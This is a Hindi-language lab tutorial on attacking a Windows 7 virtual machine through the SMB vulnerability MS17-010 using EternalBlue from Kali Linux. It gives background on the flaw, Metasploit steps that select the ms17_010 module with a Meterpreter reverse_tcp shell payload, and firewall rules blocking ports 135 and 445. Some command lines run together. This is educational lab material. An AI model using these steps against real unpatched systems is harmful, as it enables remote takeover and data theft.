
LAB: SMB प्रोटोकॉल भेद्यता के आधार पर विंडोज़ ऑपरेटिंग सिस्टम पर हमला।
इस लैब में हम SMB प्रोटोकॉल की भेद्यता के आधार पर विंडोज़ ऑपरेटिंग सिस्टम पर हमले का अनुकरण करने के लिए दो कंप्यूटरों का उपयोग करेंगे। एक मशीन Kali Linux ऑपरेटिंग सिस्टम चलाती है, जो हमलावर (hacker) की भूमिका निभाती है। और एक कंप्यूटर पीड़ित मशीन (victim) की भूमिका निभाता है। पीड़ित मशीन SMB भेद्यता वाले Windows 7 64-बिट ऑपरेटिंग सिस्टम पर चल रही है। ऐसा करने के लिए, Kali Linux मशीन पर हम EternalBlue नामक शोषण कोड का उपयोग Windows 7 मशीन पर हमला करने के लिए करेंगे।
सर्वर मैसेज ब्लॉक (SMB) Microsoft के Windows प्लेटफ़ॉर्म पर एक काफी लोकप्रिय फ़ाइल साझाकरण प्रोटोकॉल है। इस SMB प्रोटोकॉल के माध्यम से, एक ही नेटवर्क लेयर या एक ही Domain में जुड़े Windows कंप्यूटर एक दूसरे के साथ फ़ाइलें साझा कर सकते हैं। आज तक, SMB को Common Internet File Sharing (CIFS) के नाम से भी जाना जाता है।
EternalBlue एक सूचना शोषण कोड है, जो पोर्ट 445 के माध्यम से SMB प्रोटोकॉल की भेद्यता पर आधारित है। प्रारंभ में, EternalBlue को यू.एस. नेशनल सिक्योरिटी एजेंसी (NSA) द्वारा विकसित किया गया था। पूरा अंग्रेजी नाम है U.S. National Security Agency। लेकिन बाद में, यह 2017 में हैकर समूह The Shadow Brokens द्वारा लीक हो गया था। उसी वर्ष, डेटा एन्क्रिप्ट करने वाले वायरस – Ransomware का एक बड़े पैमाने पर हमला, जो Microsoft के Windows चलाने वाले कंप्यूटरों पर लक्षित था, दुनिया भर में हुआ। इनमें से सबसे प्रसिद्ध WannaCry वायरस था। आज तक, हालाँकि इस भेद्यता को Microsoft द्वारा सुरक्षा अद्यतन MS17-010 के साथ पैच किया जा चुका है। फिर भी, दुनिया में बड़ी संख्या में कंप्यूटर जो Windows ऑपरेटिंग सिस्टम चला रहे हैं, में यह भेद्यता अभी भी मौजूद है। यह भेद्यता CVE-2017-0144 में प्रकाशित की गई है। (Windows SMB Remote Code Execution Vulnerability)। यह भेद्यता अत्यंत खतरनाक है और बहुत आसानी से शोषण की जा सकती है। उल्लेखनीय बात यह है कि इस SMB प्रोटोकॉल भेद्यता के माध्यम से हमला करने के लिए। हैकर को पीड़ित को कोई दुर्भावनापूर्ण वायरस डाउनलोड करने या चलाने के लिए भेजने या धोखा देने की आवश्यकता नहीं है। यानी, पीड़ित चाहे कुछ भी न करे, फिर भी हैकर आसानी से हमला करके कंप्यूटर का नियंत्रण ले सकता है, बिना उसे पता चले।
VMware Workstation सॉफ़्टवेयर पर चलने वाली 02 वर्चुअल मशीनें तैयार करें:

Kali (attack) वर्चुअल मशीन पर:
ifconfigservice postgresql startservice postgresql statusWindows 7 (victim) वर्चुअल मशीन पर:
ipconfigmsfconsole
search ms17_010
use 0 -> set payload windows/x64/meterpreter/reverse_tcp

=> इस बिंदु पर, हैकर पीड़ित मशीन में सफलतापूर्वक घुसपैठ कर चुका है। अब, हैकर बिना उन्हें पता चले पीड़ित मशीन से फ़ाइलें हटा या चुरा सकता है। यहाँ तक कि हैकर सीधे उस पर वायरस अपलोड और चला सकता है।
SMB प्रोटोकॉल के शोषण और दुरुपयोग से बचने के लिए। हमें निम्नलिखित कार्य करने की आवश्यकता है:
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"